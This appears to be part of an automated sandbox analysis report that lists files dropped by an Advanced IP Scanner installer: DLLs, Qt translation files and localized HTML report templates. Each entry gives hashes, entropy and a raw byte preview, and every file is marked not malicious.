                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):21184
                                                                                                                      Entropy (8bit):6.908629649625132
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:UzW2hWEgbCA0GftpBjJ6EKz3lvQyURz8X:y28i36bdvU2X
                                                                                                                      MD5:1FA7C2B81CDFD7ACE42A2A9A0781C946
                                                                                                                      SHA1:F5B7117D18A7335228829447E3ECCC7B806EF478
                                                                                                                      SHA-256:CAFDB772A1D7ACF0807478FDBA1E00FD101FC29C136547B37131F80D21DACFFD
                                                                                                                      SHA-512:339CDAF8DE445CF05BC201400D65BB9037EA7A3782BA76864842ADB6FBE5445D06863227DD774AB50E6F582B75886B302D5DD152AFF1825CF90E4F252398ACE0
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):73408
                                                                                                                      Entropy (8bit):5.811008103709619
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:nt2b2De5c4bFX2Jy2cvxXWpD9d3334BkZnkPgE79g:nw2De5c4bFX2Jy2cvxXWpD9d3334BkZ3
                                                                                                                      MD5:1DD5666125B8734E92B1041139FA6C37
                                                                                                                      SHA1:22E9566352E77AB15A917B45A86C0DC548431692
                                                                                                                      SHA-256:D0FF5F6BB94961D4C17F0709297A6B5A5FA323C9AC82F4FE27187912B4B13CF3
                                                                                                                      SHA-512:420B9184842ECD7969BF75F0D8A62569725624AE413C83EE3B6F26973318B4170287F657F2BE8DD3E7FC71264D69B2203E016D078615AD6E31E65033D5C59654
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................................................................@.............................8................................<..............8............................................................................text...H........................... ..`.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:Qt Translation file
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):27607
                                                                                                                      Entropy (8bit):4.7796924802259895
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:fDrEdeVx7lvwfFTCGmlTDZOqKvO2HMfhm:fDrEdolofFWGmlTDZOVGSIhm
                                                                                                                      MD5:3AB470D0817DA632BCDA59AB7C24C08B
                                                                                                                      SHA1:C2A643FF68C75A0573ED6A506427F3233848453C
                                                                                                                      SHA-256:8E66FB8FB713DD256C72D5E007E041A6CD435A9A76406B9C345DFD0E3476A351
                                                                                                                      SHA-512:A1B3A9F7AD04C9154EDF417FA3A6D80EEBCDA3A11E07588C0CEBE33A687A5B5985AD546DB4AC4CED02E1608295219807C464971CAA8F3F00ADD6E0794062F128
                                                                                                                      Malicious:false
                                                                                                                      Preview:<.d....!..`...B..........W....;...4...;...-...;.......;.. ....;..Bv...O..Z....[..Vr...^../I...^..RJ..(5...]..G.......H,..O*..K...>...N:......V...C..._...[.......(Z......OY...y..O........9..............W....t..*....t..PV...t..Z7.....?....j......5t...o..@...A...H5..X]..f.../s......Dr...................~..28...`..6z...e..Y.......Y.......... =...E..*.y...p.*.y.....*.%..$B.*.0..$m.+.......+.....T.+......+......+....&..G.......G....*}.H0...Z..Hw9.....Hw9.....I....(..J6......J6......J6....n.J6...H7.LD......L.b..Zh.M.S..@..R.......V..../..Wi...YZ.W.T.....Z.|..Q..[f3..T..gc......w0K..F...H...%!......[N...T......."..4 ...~..6... d..D....T..-...2....1......X......._..9.E..?8.L.#..a..M$o.....e.....`.l8...5....^..Hp..I....`......A.......Q.......X...>...3..>......3../...l...I.......9..5.l..^#.AV...'..y....V....0..R.......Q.......X'..tb..4.......................S3......<b......M..(....Rz.1V...(..R....1=.W.<..^..f.~..!.......3...1........^..5#...5...m......<...c..ER.;6...`/.q.J..N...I.......I
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):22208
                                                                                                                      Entropy (8bit):6.906399541614446
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:3CYPvVX8rFTsdWVghW/VvSx9YOCAs/nGfe4pBjSfZCLWNArXVWQ4mWbmqnaj9Rlg:1PvVXfW2hW9SUA0GftpBj8yBlBRAkad
                                                                                                                      MD5:779A8B14C22E463EA535CBCA9EA84D49
                                                                                                                      SHA1:4620531D5291878C10D6E3974F240B98BC7FB4B9
                                                                                                                      SHA-256:FC0551DE11B310DFD8F3FC924F309D5E754B547FFC475CF6C3D007BB5366F148
                                                                                                                      SHA-512:08882528DF66FC582A890AD64C7F96E8F9DE56D4871A4D9B6B32E1C3FFB0C29B425F4CC893B2575F6697FFAFBB56BA84D43D602483B0470488DF823D445B84E4
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!.........................0...............................@.......6....@..........................................0...................<..............8............................................................................text............................... ..`.rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:Qt Translation file
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):27649
                                                                                                                      Entropy (8bit):4.760709648438812
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:lDAmfKQkdX+kxl/Pnaz/ewJ5T5XTo5vJRaZ/igxcx9:7S/dOkx1Pnaz2wpeWOn
                                                                                                                      MD5:C41CF1ECCEF6EB2CB6BBAF02A383BC28
                                                                                                                      SHA1:B2E5D8721D04232F7219AC00496379C14576E33D
                                                                                                                      SHA-256:61FD26C0CCFB205E3FA2E1F530FFE210F10A17ABEBDDA7DC085E404CEAB9FD69
                                                                                                                      SHA-512:341FBEB45CFE794FE76E033383111BB404DAF630746996F7B7CEA49DE9953A93C75E332C50E37513639D5D521C4BAD2D37F44F5E94AA215221BBB1D148FEE4A2
                                                                                                                      Malicious:false
                                                                                                                      Preview:<.d....!..`...B..........W....;...X...;.......;...U...;..!?...;..B....O..Z....[..V....^../....^..Rh..(5......G....$..H,..Op..K...?T..N:......V...DQ.._...\.......(.......O....y..P........o.......t......W....t..*s...t..Pv...t..Zo.....@@...j...#..5t......@...B...H5..X...f.../.......E....................~..2....`..6....e..Y.......Z........(. =...F..*.y.....*.y...A.*.%..$..*.0..$..+.......+.......+....<.+......+....&..G.... M.G....*..H0...ZC.Hw9...q.Hw9...c.I....(r.J6....".J6......J6......J6...H..LD......L.b..Z..M.S..@..R.....\.V..../..Wi...Y..W.T.....Z.|..QE.[f3..U..gc......w0K..G<..H...%.......[....T......."..4T...~..6b.. d..E{...T......2....+......X......._M.9.E..?..L.#..a..M$o.....e.......l8...5....^..H...I....b......B4......R!......X...>...=..>......3../K..l...JN......9p.5.l..^C.AV...(1.y....V....0..R.......Q.......XM..tb..4................s......SS......<.......N..(....R..1V...)L.R....1..W.<..^..f.~..".......3...1........^..5e...5..............c..E..;6...`g.q.J..N...I.......I
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):19648
                                                                                                                      Entropy (8bit):6.97635016555389
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:UjcW2hWX7QA0GftpBju0dtTxZlBRAk9l3:yAwyi8or1RAO
                                                                                                                      MD5:3B038338C1EB179D8EEE3883CF42BC3E
                                                                                                                      SHA1:EA97CF2EE16EF2DF3766A40C6CE33C8BE5F683B2
                                                                                                                      SHA-256:C17786E9031062F56E4B205F394A795E11EF9367B922763DDF391F2ACAB2E979
                                                                                                                      SHA-512:1A6D8FC065237BF0DBBA18C777958522697B6BC2BE1B16586870A0C06178D65B521F66F522BF5636DF793E4AC8A2A3DE780B3C7062273A11F52A381EE851ECE6
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......Ts....@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:Qt Translation file
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):28344
                                                                                                                      Entropy (8bit):4.687451491727224
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:qjVfhQdGPdlCzQt1OY8L7HP7xpLnR0l7sY1m1ZDxE0FTlHwLGW6F0:qjthQoPdlkQt1O1Hv7xpLnul7xcFxFr0
                                                                                                                      MD5:950906410E936E0BB5F109082105D7B6
                                                                                                                      SHA1:C2B7B811141FDAC2DBC712095759E3C68CE77565
                                                                                                                      SHA-256:F0DB0B2040454AE4CF27A7398C28E4C32CD0151D30AD1ED59ACC8C8C021335CF
                                                                                                                      SHA-512:FC7A0D8B6E9D1E82E8596CCF57889B55B455D3A8036D78FB190BEDC724BC28588F68A295C42AEBBEC1623F7AE78ADACD94F2791F4008874C0B7CFFD2845181AA
                                                                                                                      Malicious:false
                                                                                                                      Preview:<.d....!..`...B..........ZB...;.......;.......;.......;..!}...;..Dp...O..]....[..X....^..07...^..T...(5......G.......H,..Q...K...@...N:...h..V...E..._...^h......)Z......Q....y..RS......................Z....t..+....t..R....t..\......A....j......5t......@...C...H5..Z...f...0g......F................!...~..3J...`..8"...e..\3......\].......H. =...G..*.y.....*.y...].*.%..%6.*.0..%g.+.....U.+.......+......+......+....'..G.... ..G....+m.H0...\..Hw9.....Hw9.....I....(..J6......J6......J6......J6...JY.LD......L.b..\..M.S..B&.R.......V....0..Wi...[..W.T.....Z.|..S..[f3..Wd.gc....F.w0K..I...H...&.......]....T......."..5....~..7... d..G....T......2....M......[L......a..9.E..A..L.#..d..M$o.....e.......l8...79...^..J...I....f......C.......Ti......[...>...]..>......3../...l...L ......:..5.l..`..AV...(..y....YQ...0..UH......T%......Z...tb..68.......!..............U.......>>......PB.(....T..1V...)..R....2=.W.<..aE.f.~.."x......5...1....I...^..6....5...=..........c..Gr.;6...b..q.J..Q8..I....M..I
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):228904
                                                                                                                      Entropy (8bit):6.499413249756033
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:5vv6tCZo5oOM7fpXiUpuF007hkeWPp4bjUAIt1zG0jvbkEV3:56tb5NM7fpXiUkFdNqB4Gt1zG0h3
                                                                                                                      MD5:0B4816D5308825B9C24FAA83CE4CB1F0
                                                                                                                      SHA1:0EEFEF3564356B50D5B360DC4B8D8D316C99B210
                                                                                                                      SHA-256:F10815CB6F99FA795B69FB547BA4376A336F46BC1FA279B486A24AD96FD74525
                                                                                                                      SHA-512:806B6B203D73D08E127365C87A9AF98811E1C93568F66DFBFAE41EE13C97AC3FE623D42BC1A1FFFE36669B14E0F4E39499EC177ECA39B7339F57E50C97B20B2B
                                                                                                                      Malicious:false
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........>..._.,._.,._.,.'],._.,.2.-._.,.7.-._.,.2.-._.,.2.-._.,.2.-._.,Q2.-._.,._.,\_.,Q2.-._.,Q2.-._.,Q21,._.,._Y,._.,Q2.-._.,Rich._.,................PE..L.....%^...........!..............................a................................?\....@.............................T\..4)..x....`...............b..(....p..."..0...T...............................@............................................text............................... ..`.rdata..............................@..@.data........P.......2..............@....rsrc........`.......8..............@..@.reloc..."...p...$...>..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:Qt Translation file
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):28416
                                                                                                                      Entropy (8bit):4.745555315840919
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:G1rjeSTVZbKagGwTFToL3RvDWI7zfoiOp3cHWyQ68rZPFaEvRVaib:OHfKagGwTFTWdDWI7boiOp3cHW3P1RVB
                                                                                                                      MD5:A8F9FC9108D8E44F2111BC7AC63C9F75
                                                                                                                      SHA1:1692FD262A44FD674D4E48644CE22C175AF0C865
                                                                                                                      SHA-256:A10D0CF6FC8DD20290BD11529DC1DB210D69B05FE518F2248D6D720AF8495470
                                                                                                                      SHA-512:99C008F4CE997384D024390A896275BCD10B53D8725F1E9CB2628AB119B1381DABC5189C60C85A817C52AF33AC3D0E2D190373C9F7F8707A6FDD508E61C4C2B9
                                                                                                                      Malicious:false
                                                                                                                      Preview:<.d....!..`...B..........Z....;.......;.......;.......;..!....;..D....O..]....[..Y^...^..0....^..U...(5......G.......H,..R...K...A...N:...r..V...F..._...^.......)d......R;...y..R.......................Z....t..+%...t..S*...t..]=.....A....j......5t......@...C...H5..[O..f...0.......F....................~..3....`..8|...e..\.......\........(. =...G..*.y.....*.y.....*.%..%..*.0..%;.+...../.+.......+....^.+......+....&..G.... ..G....+..H0...]..Hw9.....Hw9.....I....)..J6....n.J6......J6....*.J6...Js.LD......L.b..]r.M.S..B`.R.......V....0..Wi...\J.W.T.....Z.|..S..[f3..W..gc....@.w0K..I ..H...%.......^T...T...%..."..5....~..8... d..GQ...T../...2....7......[.......b..9.E..At.L.#..d..M$o...h.e.......l8...7....^..J...I....H......C.......T.......[u..>...S..>......3..09..l...LZ......;,.5.l..a..AV...(..y....Y....0..U.......T.......[...tb..6f......................V.......>.......P..(....UP.1V...)..R....2..W.<..a..f.~.."N......5*..1...._...^..6....5...A..........c..G..;6...cU.q.J..Q...I....;..I
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1148
                                                                                                                      Entropy (8bit):4.7922327669232505
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:lFoufsuSqJXqL0He3yk/0Kt5RGDNsm6ReEhyv:HnfsRqJXqL0He3ym0U2D+mAs
                                                                                                                      MD5:88B009CCACF0EB1B4A141470D3F160C4
                                                                                                                      SHA1:EE0D1A44562CCDEDBCDE92D232FA541F53826B4B
                                                                                                                      SHA-256:D2254ED99166A12CE00F93379142ACFCBF9A49AF3FB8789E8215B0C1CCCB4587
                                                                                                                      SHA-512:D07C7B90A12E7E48A90BF450A57E4479AE5BB130EFE9950A316D9A7AB9063D94AF0F35942925ACA41A7C2C149A0F31A075C38DD0B34821F88BD81588660D0BE1
                                                                                                                      Malicious:false
                                                                                                                      Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Sistem operasi:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Produsen:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Pengguna:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Tipe:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Tanggal:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Komentar:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Layanan</center></b></td><td><b><center>Rincian</center>
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):5987880
                                                                                                                      Entropy (8bit):6.645849589307296
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:98304:I9HgaLmICbZhV8cBfAVG4F40zkpEJsv6tWKFdu9CcDo+fN4A:I9Hgaq5b7OcBfAVG4FiEJsv6tWKFdu9V
                                                                                                                      MD5:C2BB94B2C229ECE69D865B1898C71324
                                                                                                                      SHA1:AFAC1A2FEDE68AD129BB48B01ED8B80997F75D2F
                                                                                                                      SHA-256:193814D47E0B7917C3373011F64CD3AC649A16D1D0515C9D409FA1794C5BFFB1
                                                                                                                      SHA-512:2CB31EB8FD866510268553B77D2BB4DDFFB4D48F22C35B8679933CB48AC7B90DE1AEFCF6132DBCEF007F6F622869C931BE13A5D41234E49E0C7DB3F8C5CF8B0A
                                                                                                                      Malicious:false
                                                                                                                      Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.............s...s...s......s.\S....s..w...s..p...s..v...s..r...s..w...s..u...s..r...s...r...s...w...s...v...s...s...s.......s.......s...q...s.Rich..s.................PE..L.....%^...........!......7...$.....|m5.......7....g..........................[.......[...@..........................eS.....|zY.|....0Z..............B[.(....@Z.8.....P.T.....................P.......P.@.............7..............................text.....7.......7................. ..`.rdata..4.!...7...!...7.............@..@.data...L.....Y..2....Y.............@....rsrc........0Z.......Y.............@..@.reloc..8....@Z.......Y.............@..B................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):19136
                                                                                                                      Entropy (8bit):6.986049300390525
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:CYaBWVghW/B7l9YOCAs/nGfe4pBjSfaMjWNArXVWQ4mW6qnajMHxxBNT0662ONLD:IBW2hWZ7QA0GftpBjj21lI663Un
                                                                                                                      MD5:FC13F11A2458879B23C87B29C2BAD934
                                                                                                                      SHA1:68B15CC21F5541DC2226E9E967E08AF81D04A537
                                                                                                                      SHA-256:624841916513409C3CFCF45589EB96548C77B829E5D56A5783249D3AB7DC8998
                                                                                                                      SHA-512:801A23485E42CC224E508212E7114E89747543A20964CF666EE801FCC2FEA97888FAA1AF8DA2AF807C50187969A08C6FCE2A021836811786EF72F4C2BDBDE33C
                                                                                                                      Malicious:false
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.............................l............ ...................<..............8............................................................................text...|........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):19648
                                                                                                                      Entropy (8bit):6.960490184684636
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:nvj+UKIMFsWVghW/AvSx9YOCAs/nGfe4pBjSf3Ir9WNArXVWQ4mWSEqnajMHxxBB:7+UhW2hWISUA0GftpBjdrZolI663UU
                                                                                                                      MD5:B9EA058418BE64F85B0FF62341F7099E
                                                                                                                      SHA1:0B37E86267D0C6782E18F734B710817B8B03DA76
                                                                                                                      SHA-256:653BE79FA676D052CCE60D743282018FAAAF22E15A3CB8F1EEE01F243D56B431
                                                                                                                      SHA-512:EFAAC54C0C6648F666B58E0441315446FDBCB8544C3B9E2005482DE25E62E716D0C66DCB7A9CEDD7967FFC26E394AE9F1B1DFDCE1D4243CFDE737140D1C3D51D
                                                                                                                      Malicious:false
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.............................E............ ...................<..............8............................................................................text...U........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:Qt Translation file
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):28292
                                                                                                                      Entropy (8bit):5.300323619618019
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:sPSD57jf9U4FM1xLvsxmE2Ly36cmKe+4sEQI+feD3/gXTQWym6:sPc7jf9U4FMbLymE2Ly36cmBAbI+fel
                                                                                                                      MD5:70059C7809B9DB196A6A58588536B7D6
                                                                                                                      SHA1:6C7C41EEEB0E59A75C0E7CA09B34E8AC9C4B8244
                                                                                                                      SHA-256:7AFB5C93E0CCE72EAFBAB5B3CE0D82E1102A750EFE9A9F079D47ADB67F60D4A5
                                                                                                                      SHA-512:EB4D5EE0E47975CF6FDDAB81AA86670233F385503983B4A8C60031C4BFA5C30BB02DB261CB9FDE6CF09686D749C9DE961294A1E00FD47330EB7A0EE9DCF3DED3
                                                                                                                      Malicious:false
                                                                                                                      Preview:<.d....!..`...B..........ZZ...;...p...;.......;.......;..!....;..D....O..]8...[..X....^..0....^..T...(5......G.......H,..Q...K...@...N:......V...FA.._...^X......)|......Q....y..RA.......a..............Z2...t..++...t..R....t..\......A....j......5t......@...C...H5..Z...f...0.......F........s...........~..3....`..8|...e..\M......\s......... =...G..*.y...b.*.y...%.*.%..%X.*.0..%..+.......+.......+......+......+....''.G.... ..G....+..H0...\..Hw9.....Hw9.....I....)..J6....:.J6......J6......J6...Jo.LD......L.b..]..M.S..BL.R.......V....0..Wi...[..W.T.....Z.|..S..[f3..Wf.gc......w0K..I0..H...&;......]....T......."..5....~..8... d..Gg...T../...2...........[b......a..9.E..AF.L.#..dQ.M$o.....e.......l8...7....^..J...I...........D4......T}......[...>...A..>......3..0E..l...L.......;..5.l..`..AV...(..y....Yi...0..UN......T7......Z...tb..6................a......U.......>d......P6.(....T..1V...*..R....2..W.<..aI.f.~.."x......5n..1....9...^..7....5...1..........c..G..;6...b..q.J..Q...I.......I
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:Qt Translation file
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):28357
                                                                                                                      Entropy (8bit):4.7436866012778625
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:5ph1weyWuzmrQaIBqQKp8GweGs4G4fc/xrRFkTMNa1xsEG07LXjXu:5pQeyWuzmMvBqQQ8GfGsQfcJUTM7S6
                                                                                                                      MD5:45864510329D981D80C616641357FEFF
                                                                                                                      SHA1:C4EB7D6D98D29656FA2DE8E9923750556408E865
                                                                                                                      SHA-256:3A3F6762C19E934B6FBE1EF38E0D68A96E8A3B7B27E196655CFA8C257529A947
                                                                                                                      SHA-512:93E671353C5C4E2F39656EE64758556BDF2FFA6185F4A4991C12B432870C830D1BACB772FD0CD0F71AF7E088D363AC1475BBA2FBCE6797D992D01BA407915D83
                                                                                                                      Malicious:false
                                                                                                                      Preview:<.d....!..`...B..........Z....;.......;...%...;.. #...;..!....;..D....O..]\...[..Y"...^..0....^..T...(5......G.......H,..Q...K...@...N:......V...E..._...^.......).......R....y..Rq......................Zj...t..+K...t..R....t..]......A....j......5t......@...C...H5..['..f...0.......F....................~..3....`..8....e..\y......\.......... =...G..*.y.....*.y.....*.%..%~.*.0..%..+.....;.+.....*.+......+....r.+....'?.G....!..G....+..H0...\..Hw9.....Hw9.....I....)4.J6....p.J6......J6....h.J6...J..LD......L.b..]4.M.S..B .R.......V....0..Wi...\$.W.T...e.Z.|..S..[f3..W~.gc....j.w0K..I...H...&U......^ ...T...+..."..5p...~..7... d..G-...T......2....'......[.......b..9.E..A(.L.#..d..M$o.....e.....B.l8...7=...^..J...I....T......C.......T.......[Q..>...9..>......3..0A..l...L8......:..5.l..`..AV...(..y....Y....0..Uf......Ta......Z...tb..6.......................U.......>Z......P`.(....U..1V...*(.R....2..W.<..a..f.~..".......5...1........^..6....5..........>...c..G~.;6...c..q.J..Q<..I....;..I
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1154
                                                                                                                      Entropy (8bit):4.808850143987916
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:lFouisuSPXqBQqHJl4/0Kt5RGDz9cReEhyv:HnisRPXqWqHJlK0U2Dz9+s
                                                                                                                      MD5:3A9608446029B501A8C31084CA170B0E
                                                                                                                      SHA1:E6643513E77B23997112741963B24C60EB4DF08C
                                                                                                                      SHA-256:2C9A4462B5BCBDBFE9D7C8E167ECA3CC8DF7DD2440BA0BBE2ACA3E21BA1C4AF6
                                                                                                                      SHA-512:58A3A091E8C03C6A83C17EF7FDE3A138EFC609FA9928801ACF75EAF7D19DED809B142940598558049AA12E9DB9F4D2C4D057FB10198D8ABCDCE2876FE983B990
                                                                                                                      Malicious:false
                                                                                                                      Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Operativsystem:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Tillverkare:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Anv.ndare:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Typ:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Datum:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Kommentarer:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Service</center></b></td><td><b><center>Detaljer</c
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1148
                                                                                                                      Entropy (8bit):4.7922327669232505
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:lFoufsuSqJXqL0He3yk/0Kt5RGDNsm6ReEhyv:HnfsRqJXqL0He3ym0U2D+mAs
                                                                                                                      MD5:88B009CCACF0EB1B4A141470D3F160C4
                                                                                                                      SHA1:EE0D1A44562CCDEDBCDE92D232FA541F53826B4B
                                                                                                                      SHA-256:D2254ED99166A12CE00F93379142ACFCBF9A49AF3FB8789E8215B0C1CCCB4587
                                                                                                                      SHA-512:D07C7B90A12E7E48A90BF450A57E4479AE5BB130EFE9950A316D9A7AB9063D94AF0F35942925ACA41A7C2C149A0F31A075C38DD0B34821F88BD81588660D0BE1
                                                                                                                      Malicious:false
